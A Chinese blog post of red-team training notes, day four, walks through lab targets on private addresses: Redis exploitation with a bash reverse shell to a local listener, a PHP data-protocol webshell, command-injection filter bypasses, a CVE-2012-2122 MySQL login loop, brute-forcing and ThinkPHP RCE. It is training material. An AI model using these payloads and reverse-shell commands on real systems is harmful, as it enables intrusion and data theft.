红队培训---day4
redis一键利用工具
工具
下完要去RedisModulesSDK/文件夹make一下
(vpn分配的是虚拟网卡的ip)
反弹shell
先本地写个shell
1 | bash -c "bash -i >& /dev/tcp/192.168.198.48/404 0>&1" |
然后本地开一个http服务
让redis下载本地shell
监听,反弹shell
练习
http://10.3.4.96:10011/ (爆破)
http://10.3.4.96:10012 (文件包含)
直接data协议写shell了
1 | http://10.3.4.96:10012/?demo=data://text/plain,<?=eval($_POST[1]);?> |
然后post传参
1 | 1=system('tac fl4gisisish3r3.php'); |
http://10.3.4.96:10013/ (命令执行)
空格被过滤,用%09绕过
1 | ip=127.0.0.1%7Ctac%09/f41ag |
http://10.3.4.96:10014/ (文件上传)
服务端遇到php会替换为空,可以双写绕过
然后执行命令
http://10.3.4.96:10015/ (xxe)
文件读取
1 | <?xml version='1.0'?> |
10.3.4.96:10016 (mysql)
fscan扫出来
法一:打cve-2012-2122
那就打cve-2012-2122
1 | for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.3.4.96 -P10016 ;done |
然后直接读数据库里的flag
法二:fscan爆破密码
1 | ./fscan -h 10.3.4.96:10016 -m mysql |
扫出弱口令
然后直接登录数据库就行
http://10.3.4.96:10017/ (think v5.0.23)
照着poc打就行
1 | POST /index.php?s=captcha HTTP/1.1 |
http://10.3.4.96:10018 (纯签到题)
http://10.3.4.96:10019 (越权)
直接构造admin然后base64编码就行
然后进入到admin.php
然后就是命令执行,用$IFS$9绕过空格过滤
1 | POST /admin.php HTTP/1.1 |
http://10.3.4.96:10020/ (任意文件下载)
dirsearch扫到有个db.php
有个下载功能
1 | http://10.3.4.96:10020/down.php?path=db.php |
直接下载
扫目录发现有个/phpmyadmin
然后直接用这个账号和密码登录找到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!
相关推荐
2025-03-24
红队培训---day1
信息收集这方面知识跟以前学的大差不差 google...
2025-03-25
红队培训---day2
sql注入基础查询语句介绍mysql免密登录(前提是拿到root权限)mysql 的配置文件它位于/etc/my.cnf或是/etc/mysql/my.cnf在其中添加(比如ubuntu是/etc/mysql/my.cnf) 12[mysqld]skip-grant-tables 然后重启服务 手注首先要先判断字段数(order by到报错,比如4报错,说明只有3个字段)、然后查库名、表名、字段名information_schema数据库schemata:information_schema数据库中存放数据库信息的表tables:information_schema数据库中存放所有数据库中表的信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME)columns:information_schema数据库中记录所有数据库中所有表中的字段信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME) 常用查询语句获取所有的库名的查询语句为: 1select schema_name from...
2025-03-26
红队培训---day3
数据库漏洞利用mysqlcve-2012-2122使用mysql命令(随机密码)连接数据库 1mysql -uroot -pwrong -h 10.3.4.87 -P3306 连接失败写一个for循环,利用cve-2012-2122漏洞,最后可以连接进入mysql数据库中win: 1for /l %i in (1,1,1000) do mysql -uroot -pwrong -h 10.3.4.87 -P3306 linux: 1for i in `seq 1 1000`;do mysql -h 10.3.4.87 -uroot -proot -P3306;done 循环一段时间后即可成功(离谱,破到一半靶机断联了) 进一步利用(判断能否读写文件)判定mysql可读可写目录 1show variables like "%secure_file_priv%"; 12341.值为空代表任意读写2.有路径,代表特定路径可读写3.NULL为不可读写 写文件写文件不要直接写马,会被直接杀,建议先写探针,这样可以验证是否被解析 1select...
2025-04-14
蓝队培训---day1
流量分析Ethernet II:看源/目标mac地址Internet Protocol Version 4:源/目的ipTransmission Control Protocol: 看源/目的端口、flag位(判断哪些端口开放:syn+ack是开放,rst是未开放) 过滤语法和实践源ip为。。。。。1ip.src== 目的ip为。。。。1ip.dst== 源/目的地址为。。。。1ip.addr== 看端口是否开放(过滤出回应syn+ack的包)1tcp.flags == 0x0012 比如找靶机开了什么端口观察分析都是攻击通过65127端口来扫描(因为靶机都是回应65127端口)那就加上 1tcp.dstport==65127 过滤请求方式比如过滤POST 1http.request.method==POST 模糊匹配路径关键字匹配http类型中带有admin@123 1http contains "admin@123" 比如匹配请求中带有upload的 1http.request.uri contains...
2025-04-15
蓝队培训---day2
入侵检测windows入侵检测排查思路按时间线找在攻击时间范围内,创建的文件 资源管理器直接资源管理器慢慢审 everything1C:\Users\DeepMountains datemodified:2024/08/15..2024/08/16 ext:exe 修改以上命令来查就行 信息收集看网络连接(排查暴露面)1netatat -ano 0.0.0.0代表全开放,排查从哪攻进来ESTABLISHED代表建立连接的,可以审查这些ip 查看主机信息1systeminfo 1msinfo32 环境变量信息1msinfo32 看到详细的系统信息,最主要的是能看到环境变量信息 1set 12cmd环境 进程信息1tasklist /v 1wmic process get * /value 12这条命令的作用是格式化输出获取的进程的所有信息 或者加个条件判断看单个进程 1wmic process where Caption="powershell.exe" get commandline...
2025-04-16
蓝队培训---day3
linux入侵排查信息收集网路连接信息1netstat -pantu 12netstat -pantul 可以用来指明方向,来找什么类型的业务 1ss -pantul 1hostname -I 12看当前靶机的ip 查看进程信息1top 1ps -ef 杀进程kill -9 pid,比如 1kill -9 11091 担心命令是否被替换上传一个busybox比如要运行ps 1busybox ps 用户排查思路uid为0的用户是恶意用户看/etc/sudoers # 这个文件指明了哪些用户有执行sudo的权限特殊文件排查,找有suid的文件,有suid的可执行程序可用于后门提权 看文件详细信息stat,比如看/etc/sudoers 1stat /etc/sudoers 排查suid置位的文件1find / -user root -perm -4000 -print 2>/dev/null 添加sudo执行权限先改大/etc/sudoers的权限 1chmod 777...
![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)